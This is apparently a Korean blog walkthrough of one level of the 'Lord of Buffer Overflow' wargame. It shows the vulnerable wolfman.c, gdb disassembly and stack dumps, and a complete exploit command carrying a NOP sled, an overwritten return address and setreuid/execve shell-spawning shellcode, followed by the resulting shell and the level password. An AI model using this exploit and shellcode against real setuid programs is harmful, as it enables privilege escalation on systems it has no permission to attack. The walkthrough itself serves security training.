[orc@localhost orc]$ cat wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %esp,%ebp
0x8048503 <main+3>: sub $0x2c,%esp
0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push $0x8048640
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add $0x4,%esp
(중간 생략)
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea 0xffffffd8(%ebp),%eax
0x80485bc <main+188>: push %eax //strcpy 실행 이전에 bp를 걸었다. argv주소를 이용했기 때문이다.
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add $0x8,%esp //<---물론 이쪽에 bp를 걸고 버퍼의 주소를 이용해도 된다.
0x80485c5 <main+197>: lea 0xffffffd8(%ebp),%eax
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push $0x8048669
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add $0x8,%esp
0x80485d6 <main+214>: push $0x28
0x80485d8 <main+216>: push $0x0
---Type <return> to continue, or q <return> to quit---
0x80485da <main+218>: lea 0xffffffd8(%ebp),%eax
0x80485dd <main+221>: push %eax
0x80485de <main+222>: call 0x8048430 <memset>
0x80485e3 <main+227>: add $0xc,%esp
0x80485e6 <main+230>: leave
0x80485e7 <main+231>: ret
0x80485e8 <main+232>: nop
0x80485e9 <main+233>: nop
(gdb) b*main+188
Breakpoint 1 at 0x80485bc
(gdb) r `python -c 'print "\xbf"*48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/orc/./wolfma1 `python -c 'print "\xbf"*48'`
0xbffffc38: 0x00000000 0x69000000 0x00363836 0x6d6f682f
0xbffffc48: 0x726f2f65 0x2f2e2f63 0x666c6f77 0x0031616d
0xbffffc58: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffc68: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffc78: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf //<--우리가 덮어쓸 ret주소
0xbffffc88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc98: 0x00000000 0x00000000 0x00000000 0x00000000
<------버퍼(40)+sfp(4)+ret(4)+nop(200)+쉘코드------> //ret에 버퍼의 nop주소를 넣어도되고 원본 문자열인 argv[1]의 nop주소를 넣어도 된다.
[orc@localhost orc]$ ./wolfman `python -c 'print "\x90"*44+"\xee\xfa\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀
bash$ whoami
wolfman
bash$ my-pass
euid = 505
love eyuna
'System Hacking > Lord of Buffer overflow' 카테고리의 다른 글
| 07.lob darkelf->orge (0) | 2018.01.08 |
|---|---|
| 06.lob wolfman->darkelf (0) | 2018.01.08 |
| 04.lob goblin->orc (0) | 2018.01.06 |
| 03.lob cobolt->goblin (0) | 2018.01.05 |
| 02.lob gremlin->cobolt (0) | 2018.01.05 |